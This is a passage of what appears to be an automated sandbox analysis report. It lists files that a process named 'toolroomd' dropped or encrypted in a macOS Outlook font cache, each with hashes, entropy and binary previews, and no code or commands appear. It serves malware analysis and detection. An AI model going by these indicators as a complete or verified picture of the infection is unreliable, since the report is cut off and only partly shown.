Category:	dropped
Size (bytes):	2122
Entropy (8bit):	7.691682974549143
Encrypted:	false
SSDEEP:	48:EPGF0VgnRZpbXxd6B4qdDEQ9wHbxirroumEB5tuZdSRoYKNpq:OGyGvCB6KWx3uF5tuZn7u
MD5:	7EBA8E54BB6A4C0A6663816369FF1376
SHA1:	4A9EBC522007A78D65A45B31451681A75212702A
SHA-256:	FE272A2DB8425F0150C4118B2F5BFAFFF88767C45F71E626DAAFF342ADBD64F4
SHA-512:	F1EAB736B62A47FF376990726A5D0204D7CFFC28EA1480D5DD23B3022A20004975FD6F87BE6F5310E9E68674B96F61A4D3E29928EA27E015B2D4A363976DF05E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a,.c.Fq.-..+tWJ.j..'`..f."#...fw...21...a..OG...yy.N.9E".M..?.hZ..[..e.A).).kk{5)..vC.Z.&Rry.h.v.Hl.An.....A,hLfC..B.hLfC..B..h.u.7f.....l.......#9!.....N....z...H..brpU...$,.......E..GA.ip.o.3.5.vT.}K...6....g=@...4Vo..B.......:9.6>..;.U..rA\|...... ...#.s........KI....;.."....3S........"q..@.+!r.7.........`G.W..E.........g..M....&...\|....r..>YL=......G....h;.jt....4-..j..U..wa.UTQ.6.J...a.Cm......'..h.....p.-....dL.OD.(I..;..k<..%......LF...9...(.. ...../mR.%r.D!.bV.... ........y...@.......P.w.._..l{.......~/RL?......,W.&..>e.b......&.`yx.=]..O....._.....^f]{.9......~...Pujhl5.b<4K9..$..}E....A..,t%.v..D..9_....]...%./.F.:..\..n.9.M8j.I8w.i.F1+......-./5<._...B...1..\...9\|6`.=..D*%$..N..z'm..b.K.z..d.......y...V,.......)M._...c...X..4~........uz7.2./s.........t.'.4.a....../.....}.)...P...FP.A.f.................y...gxZ.^......T.\..N....#.4.p7.....(~1i....uu.uX`?...OOC..i..#.Ef...:&3....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Brush Script MTItalic.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1906
Entropy (8bit):	7.648808934078049
Encrypted:	false
SSDEEP:	48:E3s7G2+T6DjboGY7yYUtRgY7GOqAYHw7g4iwNpq:F7YT6roGY7pUXgY7GOQuJiwu
MD5:	4F935CD56A99C7CCDEB446AD2B266551
SHA1:	69193643A37D555C96D4EA70471CDB79B4DCA90C
SHA-256:	4A923C8801E3656173F37808664B639CBD834636F9984A697F98E1E92FE3ECBF
SHA-512:	3A0C8353151C4EA1DCB098B27A63B82DCD38E655943E0B5CA21FDCB848AC3358B2FC9F6A53BD11386C76353139A59A21013F8FD7AECCB510D2E920E9E228FC85
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a./iV..V.%)......#b...:d.?..I[Y.O.../...`t]{Q...+......\0.}..Vb...:K...u...9^...W9..K..3#....mG.!.R.s.P.8t=....8t=....8t=....N............0.l...>........r....Z;.N...$.Y"O..DW..)fa.u.82...G.......1.........Gce........k.U.......8u......'....;...GN.....K...FiS.YwP&....+W..].C..?.U..~^(..n...%.l..+.....aS.......X.eF.=..`......j..m2..{.P.P6...D....RV.w.....J:.J......'d...$....keu$.............l.^.n..m..I.!.^.:1.Z..c..RNwk.b.t,..e.^Y.!..1...eO]..x..+..,i;.\....o+..Hm.r.a.7.H..{....I\|O.$z#_../...H\=..-.sf...t+.l..A.f....&.1..k%c.H8..?....$..#..,.VcI..\....t.-. ..,..$.k.G...R......8x.......kYaL..f..W....].. ._.y.........E........z.XMp.....R)..T.T.T.nS.....3n.%H....K.Qp..z..Z;FM....~.......U5Na...#....~.4.......!...g...@.....l@Az.....i.......<..D..@......~.4..d..`.....V...@.Iv....k....U.....7....E.X0PjM..[..k8.......OMC...._..Qz.M...Z....o....BHD-...5.\|^......o.VK..$...wwn^...."......L..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CalibriRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	7.2769644238589
Encrypted:	false
SSDEEP:	24:EFLDf3Rr45ocMe6BDVckfywYcUJ2GWXisAWxzGsePc0m7:ExRkIe6BWk+F2GWX/iNpq
MD5:	6AE746806A029E610D820E36182FA0EF
SHA1:	EDAF792DBD5AE77342747A80B97E77FE9E23C445
SHA-256:	225EE40904CC0A62EF09CFD64F6B58EB178C443AF30A460069F3650259BB2217
SHA-512:	ADA367EFADDE24CC84FCEFC17C4949B27247B13D8A8D4A0F06B59E48E1054DF648F11A94F98F3BC26DE3D09207C4E35B8B3C95646667E753B39EC20994CC7A80
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aC.q-.wb6...X.g.=.Z..I.b.e...D....M.'....El..q.......5..(G..oX...s.xo...Z.x..;...a..............u>/.h.`..7-l.nT;..Ni.......$B%".o./.-.vB........H.tb...0.7.z.L.,.eN.Iy.j..............Rt..^.{.g.e-\|....p.Q..z.\t.. L.f.'^{...j/........#..)...j.3H..j....}..J..uj....N....?P-.. .D<..&o\|.MRW..Q9.<..MK............_...R.u;........Gk.\..p.q...J.Bu...q6..o/.of....W..}..e(D~..m,\...5.Oa,..7....}.......iX.$".59.\.z.'..np:....3I....v.e.........."..E.~.y.%i?`gz..\|.K..W...Rt....6e3..s....>.....#......Z.....G..].^...\|.. .k.&...<_..~...5...K...I..........."e...T..B.HX..i....Y....,....s.....V-..]j..o....0.rX....:.u..bN...S..6l..j..3B.Nh..o..C.x.a&.......S..x.........y...d...3.w&.[.].....$v@.;.Z7.E\.:........).................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Cambria MathRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1762
Entropy (8bit):	7.59091156568428
Encrypted:	false
SSDEEP:	48:EVkrXrRTSWefe4cTnfEGr74pQm6IQMhKeX8nIZSNpq:h7RTNePinfvY56qt81u
MD5:	DD2DB8C9694A7E5002BFEA348F3D7799
SHA1:	986453BC5613829D153B299055DEAB645B78BC0E
SHA-256:	292937124EB28536E0888EEC3ABC85506B088DA88258938285C42FEB30D90444
SHA-512:	FC7C40D4D2DB147B75D4D6353DE169C2E579E37DF346D59562CD5098F8A2680DF3ECAE78ED5CB79AF8C83E1E6C5563B23B021F54AB603DD34CE8CF30AE7B627E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...[y..:...3..M....B:..1ih.;n.$....^^.W.......;.s.....R5.y../cV....b.7K>.....>y<.....Q.B=D.!.W.H(+...V..).v......>....'.>....'t...B..XM.h...jtXP..1.n.0..'....[o..p..c..y\.?..5........V...d._..~.D5.S.{..Q...3...(._1....Q.l.f..pt.&7;..\!...j..!.w.gp-Y..5Z pL....t...=A........G..Jf.?...d..J......i..#4q..3...K........#=I...i.....f..6Cx..+..L[...\..K.2.k.G.W..D... >.?...7..(......v.~."SG....}..b.` ..I.Z.[....;/.....q..`QX.a...$..&....6?m.D.P.........d.}-.m......\.[.D.3.y.$..8&C.J~.~..q....._.)`(......K.....zJ3.?..U.x.....c.T/.].w..d}..~+.]...z....v:._........#.. .{..\|[.W..Y....x..h.........57..}..%..H....f.K...O..9.......9..N.e..Q(.$..7;N......~N2...]..;..GF...%..~..~....%j$\...rq.g..w.m%....T.H..t..,..#..@.=.(dW....}..]..M......$l9U?=D.v...E.^....WLP/....tb....y.....X ...0.W0F.....n........%...O....Zv.../.&(.../d..1Qv.l<.....~}l.Y..tI.U.ZP..D.(.z2.6..z{.K.....N............\..M..."

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CambriaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1298
Entropy (8bit):	7.383165296574755
Encrypted:	false
SSDEEP:	24:Ed124Hg8SR6j4UZ4l4L42GsUBoTPM1RRRPRNjsePc0m7:EH/A8Z4UZ4eGRGTPyRPPRNjNpq
MD5:	817FADF52B647F9EC429352987EA554A
SHA1:	316FA10C43B44B444573896E80DD641999C68F4D
SHA-256:	CE36B0B0DFA49F2537F62104C6C0DA68223631AEEDCB3E7EF4F7EDB7089AA5C2
SHA-512:	AB19B502C0C04C9400649AA7C6C6D64F682118D3F4907538EAA8201F800C5E093101AAA1D36EEF16D36BA7A31D1A822A81A1BC7215EF6245C89266854A0D6661
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.c..!......T4.c...y.]..0r...U....C.}.....n.X.I(..j.G.DG."`.P.K.'..\.0Y9...s.Y.VBZyQ..^g..\|....+..n{.................G.....WQ.E.T.......:7...n.C..H..C.V"..../Dc...o.&-..A.(j..y.s.{S'.".....!...%L.MrL.z.R._.!6..k.nC..;<.h.)W...S6^..,.Vi...V..a;#...../[{,....@.....U....jZ.K..vp...r{..kY..U5..<^.fw..5.*-$..r..p.$..;..G.-....sRs...).u..`..........}..OeH.ta.d:..U.P..g.Rmn.$...pQ..S.F/8.]...e...A?....,..[.1....V...h..c...L..BG..B.........:..W....:....~...:.....~............<D+.....C.....7.V..k.mz....p.).5.$F.n.91...^.1.z.z.t.s.z..X.rNO.....V.`.....,...$BJ..d-.k...b..C..Z...yD@TJ..K8zBh.'...?.......S.eq......(...%......6(8......x"C.+L....`{K...GZ.......O.vH#n0.....;2............^"&...r.k64.(...M..{..........0....V....,..n........})...M.q@O,.,...d5..!...............n......W.~.^.c_M.c.t.5C...........K(.......5......pR...<.....HWb...l.t......:..d:~o..O......uF5.7..-..A%.....0.$j=%.......G.........

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Century GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.593885241058567
Encrypted:	false
SSDEEP:	48:EQgehTfr1mu3i77QEIkj6rwrbK1JPRENpq:8u1mu3A9IkjHrbEjEu
MD5:	742CF5EB72DA8C9AD2E0EE8DB62E3DAA
SHA1:	5A6121143D4808C72BBD974BE919DC9E6F2E2E54
SHA-256:	9473D994B25B8D2FF52C54C9FFEF9365E1BCFC98494671AF1260BF082525A7F8
SHA-512:	7F3C82F8A4D61C0338DBD84D290E13618C00EEA3C15B237361BFB1262E4354DCB21AAF47021B11C1D346E1F911CF6CEA7FC2D8EE4C71FA2A4D3D4B19C92AA35D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.`.......)..A..O.9B.Ro..0&.3.-..V@3..(.JF`.-..&...-.PG7.....Wq....T.5..z....I&%..g.r>2..j.C.C gt........(...f..........I..%m.I..%m.I..%m....B.../.o....^..[_.y.]k0...................i.Q..G,b.....B[.%.....a.....;.zf..G@.....$....GM1....H...@.b}h........@...U#.......(.EE{{...o..h~.R..Ly.H..pff9..,.z.......e..ip....}B....X!.l..'.^!\|P..!..:=9.7..;)]^..O..V.....Y.V.....;......<d...t..\|....\.E.]...'..L;/X..#......kAo..f..~..[.8N.L..F..l...+1R...Z..n..%.Yj..) ..?W........<..;r....4.<.'...!P.;.zOo..g..9".{.@.I."...7....=py..-S...N(Lf.n......A.u.I.../.].&g.sN1G./..TG..q..>^....5...D.(......t%../.s..h..Lt........vQJ.p.~.L.3.h.h..9....U.&..L*..2T..U_(............1..,$p.{%#6..../c..1+.c._U.d}..T6..........E.....;..Z/....;.n....>,yM..5..[.....).c.Ugd......K.aU/..CBT..y....r\|Y.cb..(.Y.pLc.V...d.AX....(<Y.2]>.R$.....z.!\..Q-...>.4....1....b.......a.+S.^..........E..gs.[..WB..I.-L..f<9Um...^N`..k.X.k

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Century SchoolbookRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2162
Entropy (8bit):	7.680789166670337
Encrypted:	false
SSDEEP:	48:Es+bnQIomc/IptCl947pNByskKys/ecW06wxNpq:v+bnQIowpMzwpbMKzW3Su
MD5:	D7F72D980DBF9428CA30568F9711125A
SHA1:	6562F1A3448EA4D1AD25FA0B1D6392A83E24F6EF
SHA-256:	924682DB7AADA55AB8C07F0AA489FA1A6BB43FA238BCAC1B9E910A46642FCD0E
SHA-512:	F3505D85BDD690AAE125EE99096A4D16171A397BD4700CDF6C89A222014E9C9F998EBA98D0D1DEB8B2F3053E8A641444A7BB4AE09593561ADBD2BD73DE699515
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...Syp.o..W..r7....DL.m.^..u.R....joG...m...m.U.y....i.?..e ..u..6~.3}..&.p.Ot....0..Rq..$.w.....6..=....6..=....6..=.. ....0....a...zAqf./.Y1._8W....~#..x.k.f\.Q....gE.x.>......_.O0..BA{............j......B..A.x...1.H\..@.....~H..W.=.R=.......ED..6..$.G.....$ e......f.._...[~=.n..I...9.d=iA...^...j,\|J.%.._1?...+..M.>0f?.S.`i1...-M.p......f:tx.....z.\o..J....J..2...w..Aq.?.S.u..v.......B..ko...`.WI.H...A.6c......8c.Q.....~.{i....6.. a.6 ..w...6.~iX3{........xy8.+.....2..}...4.W@j..MA_Q...b.C.WD........../A^Rg. ...B.z.~a........ ".m@mC.Fh.C..h(_.M.\|k.I......b.e".....\|.0.Q..W..@\|....o. GH.}^.........;...Y>_G.....2.=.?....Zm.ceX....73..._.\|1}5..\a.I..C.(....\|.8..<.4....p+....\|:.~......xP.VV...5.O......x...1.T.qI....~Il..?(l.tj8...........-..sw.XP....u....c..j..R.cU..kfl_..\|7'.....<....a.,...7/....W.Afh7.s........A....{.`....[..i.].B...5...Q.K.M..........@.@.jG...W...#.....$`........_

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CenturyRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1226
Entropy (8bit):	7.371986400943194
Encrypted:	false
SSDEEP:	24:E2QHCDEQMq44QnzGpakj96UwEvj3QLsnxbQLRsePc0m7:E2QHCDEQRnIq8m9BwEvsLoxbQNNpq
MD5:	BA5738573A5E7AEEE98555344B96777B
SHA1:	9834D3521D51C6727EB17B6FFDD1870A4188FF94
SHA-256:	9F6797DD33B691A1B769D9CE9E4071E2B6AF0B1B92ABDF6FB74B95C637967E3B
SHA-512:	51A8486A2C2930FD1CDD3255D61B75DB23EA52D49427DEFB6C5FA6A5BAE36BC0352A44E88F73E9DFEED5C9DBE842BF060901B86D4C670FC36151AE9B21B9D2EA
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..L.]..&..P&.~...2.z.:...G.b+md.A.8.....F..n....I...U.g..O.._HX.{..0.7,.....ht..ZX....@r.k.=.R=9T.y.L....6..S...l..gP.!B..P..0"6....r.......bf..N..`....QJ.Zv_.(q1.N.v;.+...f......r.R:..8<}.]g......:ZX......v.M.A.....~Z{1..1..X..^....)..Oe.R. ...$......t...................F.f.VH..q......6..f....3.....).n...]..Q( .....} H..Y...Zu........//.l...G+.{.)d.\.)i/.a.%....2x..%..a....fF{/}h..E/MxvL....(..a].M..N....5M....<......2..F..{w...n....).L..Lb.!..2..v......l.....e. SM...u.2,B......r....K.o@../#...:..#.\|C.Q........; ..p.#Y_....K.AO....v....z....'-PC....\~=...cf.b.S....W.P.7..#....{..V.....p....X.$.4..7...p.I..Q.i.Y{.d'X.g.....`$?u$vk.$a.3y..SX...[...aFq.\.....K...:(H.o...I.V....F..4t..S.u.x.5..P:hU.....@....Y.....nG.4...:.. .,.h?.}...\...]..F.%....k.j.W..J..+g..............{.G..8..T2...w.......q7?J...01.\|to4....i.... ...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Chalkboard SERegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1922
Entropy (8bit):	7.637138945328243
Encrypted:	false
SSDEEP:	48:EzWcBRc78sWHmsIvz62oqkV7mfVDx1LONpq:6S8sWH/bFmfdOu
MD5:	05B61611B556FFB82828ABA4D52F988B
SHA1:	63B6580D9336CB192E02BB012C8F9F29C5413211
SHA-256:	3DB7457E134A29EC03958426DF408BE909DEB2D12C1EA0950C40DA67CEC7B86A
SHA-512:	2239212E6F8CC70D1048EBE69D7B26A8F6D3D2CBEE1E8E1B7A976DE80012E5DE79A0205B9B2A7861F2C630C866FA95FCA20C84FEEB7942AF9461C5C55BE98B78
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..6...w.[...>.6V.vHN..D....%.J.....~.6...H....m........fB>.>.T'.v.....F...n(.....7M.L.......x.&e.q...7~.:.....:.....:.....kQ.l..xI...........R...6..K..07.....cW..X..@.K.P.x.X.."....vA.u....h..yY......4.g'FQX..]...a.4....\.{.g6F..`L..4...i<.\|e$......nq.T..\.X4......Z....aW..g..c........\....t..a..a...Cu=;../.Q.2....gZ.99.8e...6..h..v95..Q.i.....>...-R..f.n.b6..Z..3..G...y.......RU..d.....).I....8Jf.\p.C@...>}....y..<.{....-d.>..g...O}R..Y.^..-_..z,..#.{!....w.Y....b;..<...oN:.Z..i?...j....r..v/.%..T.(..D'...\|.'.........y..Yo...5.+}.CX.....4_.e.........sw!.......>.;..v..."/uH...oG.#..H.u.O...9.@.1..pY...k..."K..e.!......X.<.i4#....GJ.X.H..d..T......k.&2....&.+..v.MS)..O@....=.0....Ow.Z..\.!..s.7Gu6.i.v.....y....8...M].cd..u.< 4V$.j........D..).$....].V(?m..N.......`1..vxx.T.N{.....v.ei m@V....BW(..'Z.r..45..h...(....g.\.0.s..\.$..W..*.G....!h...dP.Oq....Q......B......_.$..Mh.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ChalkboardRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	7.544830792958256
Encrypted:	false
SSDEEP:	24:E++NPeHrGblbZfjniGjUB8FPMDKyxPuUSWCzc++sVJvIqQWb/sePc0m7:EvErGJRTvUB8FPmKylSIoJL7b/Npq
MD5:	36BCD77B26440033F5ADEDD238FF7A8E
SHA1:	8224AC8C2509F053A3F852FA0158C90660673F7C
SHA-256:	DD2D5E5CD61B2A0D4C07EBC98BB627BB8ADB2401C76C9051998DAF668FF9F842
SHA-512:	18F3B7FE0DDC042E2C5B1CD2BD2AAB7A31AE8F8F75613259086466FD5710F9231CCF92015CE66CEC40E12D800EDACDA86CDD14193D4874F392590400DD9FC867
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...........~....:6\....xQQ.2...l.....>l..>....j^z..<e02.i..f...HDW.z.Ng...b$U..i.m0...`.AA_......c.=...H......IM....MQ......=...83..y.DU.jE..W..R.7i.....:...z.....\|.....s.w.....5..".\|.^.h....7.D.s.LwK.&\....Il..h.E..A..........8&Jy..1.z.).Y+..>. .........eo.._.......].c.M.Px.WU..e.M..D....A..5.;c.P.#.tQ..R^..b.t..$...o.W....o...C.$B.#.Sn....y..._Z..Ov./..S.si;...0O.....ZFY .d... .u.^.l..No8.q......4.Xt.C.V....8.w .P.W....t0Q...q....>.{\...u..l.Z.N.H..'..2.V...o-.....(lU.G....<.E3.u.+..^;.....Rd..bV.I.6^.Hw.qY..!7v...@.....,.@..]v....sR..B..k....X\.M... w..+. ^...;]r.....J,cW\|.N.....c.@.U..X..@L8n....\j..f/...5g.G...)...6{....~.7..d.......Q.2f6@f.8..~d4#......\........H.F..7`...@V......@y.vb.\t.;.....8..._[..x...?......-.D..ws......qT..G.<.R.y..0..`..!.........h.8?.J^.q....=i]....R.[.......7.......S...y..9_.H....v...~tV.n.......t..!.......S......e..y..4..@.....f..rF.j.At=\W=P.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ChalkdusterRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.642489454159381
Encrypted:	false
SSDEEP:	48:EKZ7Klp9j6jR+p9sJOkKHXJULzAnaeymdA46E9yQNpq:ab56c92Oj+LzWaciFE97u
MD5:	8965FBB2E84E1B59035F6048CBCE6FD6
SHA1:	3876A19AF5EAD9360488C7CC208F4F65E0E2C1B1
SHA-256:	ACB4C29FFC16C20939193CA672288B0E814EE4EA8F8030F2FC96521C84AE60E2
SHA-512:	7C2A54D7D172C2245558B223C5F3726C6B219F9A5878C23BCE3FBFE0F5662D0AB92C2D4CB3E5B583B81566C1073F25A009F62BC8B97CE589025C18F671A77B54
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.....I....Ms.H.z..\.(.%.)Z.".,..0........-V.....,... ?./...6A......U".8.G}.....p...F.Xx..4.1..=..0e....F..>.[.."YPDm.N.........!PP..}.rK..6...d.0.E....Z.~6!..W..`T..s...o.......,r#JN+0.m..0..y.....}....~....-.iH.j9_...L...I\..T..=.(6..q.........V..b....a...7..H.....SG....:9A.....K.1.....6-FX.8.&'o.0.v...\..h.@-.-J3.'......w.$Nt.)..N ...w.u..b..QQ..0...G.A[.;.G....?..R..U.~.\tW....Z..<.J[.3.i.K*..K$..y1.X.\{.m..<.~.t...KN..E..V.J .....X[........qf..].4....T=.Q.Z...H....E'...H"...!>.jwXj.@.....gAIx...%.<.x.-.b...\Jig.`>..:+.g...bL..M.[..w<"....\|..?....h...0s.......K.Q..v.\.....sb...v....0r.....S..}7.#.B..:...p...g...;@....b.]L...h.=G..g4P'].}...1..H.....N@...dp.R..".......o.F..fH..O.....+?..zU.r.._k.a.....Q..L..0Y..L....u.....D..ba.Bu...n.........NtR.<tE......>...I.u.....TX......@^..3..w..<w....~..p......R.(.....i.v...K6R...ojpb.Ro.........?.'..{.$...u...Q.E6CN..`........y`.G...G

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CharterRoman.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1130
Entropy (8bit):	7.280410061868784
Encrypted:	false
SSDEEP:	24:EaLH9sW9OImGaPLdLLcMLr2Yrr5NyaQenuMGqwGmtllGsePc0m7:Ea7OW9OnBFlrxH2aVnuxqjmXlGNpq
MD5:	A83B443B231D869A651AE8AE83D8BE70
SHA1:	848DA285FF034767C96F760F0B2DD539BEFDAEFE
SHA-256:	EBBFC169106E2777475E7B2BD38D952509458E2739D74B66E34080CDAE8EA103
SHA-512:	9506F3A2E3D91A030B6F461F359CE3A2090712F59F1514D88EA694FAA90C2E98AE50A4F4967D2868102D88B4C8FD4E09C9899B95C902EFE1D26A21137108E8F6
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.5...)b...>..Q,...\...R...X.j.Xz..q..?X.&4.........{..W..N...joq.R..{.6L....L..>.U..@....j....%g4y6.....F.H%0A.G.6 ....RpT..y....."..)'.l.....]X}^.i...-......J9su..s.[R=I...Ev..^j...)Wh....f..&.7Y2..\..EH..;.lAI...hT.T.........0T.?.bOo[.....iS#.J...O.M.E.).)...0....L.R.E...j.t>....Nf..I.6.......\|.4.n.O....>i.....O.m.n8.E.,{X.aY....:.....$..-s.<..b2......01.i...I.lmF..:....%.f....\|.....1....`..../.m....A..6..BT.juiJ...8...e^>..T.....ly.F..=8...1._;.... ...0.~?..p.............>......KO..0~.u=..]t:..E....$......D~t..K......&9.i........\|.;^.2..=%..z...~_.....v..~..q.J...<..}.I.q~/P.Y..k....l{.........`..:K.e..a...C...........q...q....i..6A8.t...e.......<.<...j.>.....'.G..x]V....#........9[!.E...izBPWy....O..T.N.h.c.0.$j=%..E..+..,..9.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CochinRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1170
Entropy (8bit):	7.301695921658724
Encrypted:	false
SSDEEP:	12:WvyOK6FENLQGQ9afhkm0nQfYrnzZrd1as90X4/ao8FnTiasewLYTc+qGm7:EKqELgsiR6YVd1au0ICo81RsePc0m7
MD5:	23D21748A9254E345257D8C5BF55E267
SHA1:	160B82CA5B1FB3ACD5164B3CA53EB45C7EC577A2
SHA-256:	69CDF33188A4D683CD10D0B8E86A8F01F06A697BAE5BD190DD0EA44F618D6956
SHA-512:	53A96E2582FA18C9E75178D8BC7B21386DFE091C6D1B657015E4F10BA66C0D8A2A6434E8E06BDD7ACE7429DCA4ED6D3A9F1AB45D4CB4A130E5A80B1F72ACAF30
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a4....4Q.1h....a.?v..l.......,/...I....#.3..1...'...&i7....:.[c..s.......I....>.Bi...q..e...z..............Z..=.k!..........I..;<...=..).;.$f.s...:N...,9.[.~..Bu.o...J}}..e.gSD....a.......ik....Gx....p.c3D....+...;..`..AYx......07.C`Z.....}...Z....-M.......PP....Z...s.6\(`.....n..n..Cp.{q.\|r}_o....O..sk...9...i.i..............d.}..T.6..S7?....O......M..{t2.D......../......(F.u..........C..n9...U.......Y-+i.._.S.N.-a..P...;A..mj..@....+.'.........2\|.<....2.H........2...e.)..O.4.f0...9X.D.V....Kw..q.o.D..6.B..@.,....~....'...D.........y.$....3.&Y)L3.k..H..,.^..d..I....#0.I......x.43....`....I"...x7lJ.U.u........k......z.rT..p..~.@{n`........P..]".YdI.'........<...>....l.6..(.)y.......C...-...+...a...bj.f...l...4\.......k.....'.G...)..49B..Z7.E\.:NtR.<tE..a.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Comic Sans MSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1826
Entropy (8bit):	7.594203711178775
Encrypted:	false
SSDEEP:	24:E9MrYQ304I1EevDDb+WD4jeNFOiKFkK2qPe10hRLOSWCnUGBatrrrVJ5LjU8sePw:ExQWuA3EjTBUqPe1mu7r/VJtzNpq
MD5:	C7375FF1E61AC1747B6A754D34508E1F
SHA1:	7AD1ED922F3EB1F564882FEBC66EB18CA357F5DE
SHA-256:	D50003894E38DC4B2AC5EA567E0B4DD6020D9FFFE92AFC2706CE246349B3AF24
SHA-512:	04510CFCC9B0D778244F9E0B71CA44C5F71E830638D3C8EA97C7D3DD12956DFEDCF0006579352389D1D8D8D79C64D066027E52C21F84686EF3BD3834DD61B26C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.U.~.+s@.B.o...#E.....I.y...8.3..aj ..pDv...IMMx.....b.W......d..1.+.tN.z....9...2.s........"]..yR.^U.9@.q9....]h...]h...]h.."N...-....c3.$.o.S...F.P....p+_iL86z...i:.L.....V...N}o.M.6#s......m21\.....-<....j..J....&..2v.C..RM......s.....6.Y..oZ.\|.....W..`3f.....3(...........o.<....N..m.M.M\|....1...v~.NK..1.....G..../.... ....v.b..b...Ux\._../.+q.5.~4.N.D.WQ....c!...'.>.......+@t..x6.N.fm.M6...J...h+Qt..]..V.'..J.]..V..K..Z...un.>7..V.\|7.]...JP:.\x....5nrs...K.+.......6..{.+s..^.;G.....?b....:......JS...Y4...y..b...1j.0.hl.(y.M...!.>.1S.:....g..[......Z..'.2B7.H.D.....QK...j...K.#-.]......X....u=FS...v...6;..h..q".,..;hV8.....V./O.?.T..zI.}.f.`C..............h%O!.+...u.h.....n-'4..8....jN/..o.&SS]....k...c...@p?...p.ax...c....4..V....1.[....."..uox. y?.K0..........?.,.........x...G.h....*.oB.H.(........_b.j3..2...d.-.}.%..(.;.m.I(.....B...P..Y.L....A.V..Iw.W..o..2e..<........N....c..Z

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ConsolasRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1450
Entropy (8bit):	7.455745857197239
Encrypted:	false
SSDEEP:	24:EtVlI77nJLNuBuGHhuBjJFjgGjK29ZfdMhMc+RnSgmsePc0m7:EtVuHfuBxScO9ZGhMcUmNpq
MD5:	4E772712B93E09CBADB21CC86FE71069
SHA1:	7D4EBCE29E40591642073593AFDDFACDA2C9F730
